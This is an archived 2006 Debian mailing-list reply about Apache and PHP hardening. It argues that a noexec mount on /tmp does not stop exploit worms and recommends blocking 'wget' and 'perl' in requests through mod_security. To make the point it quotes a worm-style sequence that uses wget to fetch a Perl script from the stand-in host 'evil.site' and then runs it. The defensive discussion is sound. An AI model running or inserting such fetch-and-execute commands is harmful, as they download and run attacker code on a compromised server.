Re: security issues with apache!

To: Enver ALTIN <ealtin@parkyeri.com>
Cc: debian-security@lists.debian.org, debian-user@lists.debian.org
Subject: Re: security issues with apache!
From: Steve Kemp <skx@debian.org>
Date: Mon, 13 Mar 2006 07:34:20 +0000
Message-id: <[🔎] 20060313073420.GA6871@steve.org.uk>
In-reply-to: <[🔎] 441518F5.50004@parkyeri.com>
References: <440D5F25.4090800@isecore.net> <[🔎] 22414.192.165.213.18.1141728978.squirrel@montblanc.homeip.net> <[🔎] 440D7086.3000700@ifi.uio.no> <[🔎] 20060307124514.GB17944@squat.noreply.org> <[🔎] 441518F5.50004@parkyeri.com>

On Mon, Mar 13, 2006 at 09:02:13AM +0200, Enver ALTIN wrote:

> If you have to leave some writable folders for Apache user, say, /tmp, 
> moving /tmp to another partition/filesystem and mounting it with 
> "noexec" option would prevent most harm /any/ PHP script can cause.

  Not true.

  Several of the receent exploit worms do the equivilent of this:

    cd /tmp
    wget http://evil.site/perl/script.pl
    perl /tmp/script.pl &

  Even if the /tmp partition is mounted noexec this will still work.
 (Although '/tmp/script.pl &' would fail.)

  Noexec can help in some situations, but blocking 'wget', 'perl'
 etc in requests via mod_security is a much more useful thing to
 do.

Steve
-- 
Debian GNU/Linux System Administration
http://www.debian-administration.org/

Reply to:

References:
- Re: security issues with apache!
  - From: "Josep Serrano" <mylists@montblanc.homeip.net>
- Re: security issues with apache!
  - From: Ismail <ismailh@ifi.uio.no>
- Re: security issues with apache!
  - From: Florian Reitmeir <florian@reitmeir.org>
- Re: security issues with apache!
  - From: Enver ALTIN <ealtin@parkyeri.com>

Prev by Date: Re: security issues with apache!
Next by Date: Idea to secure ssh [was: howto block ssh brute-force]
Previous by thread: Re: security issues with apache!
Next by thread: Re: security issues with apache!
Index(es):
- Date
- Thread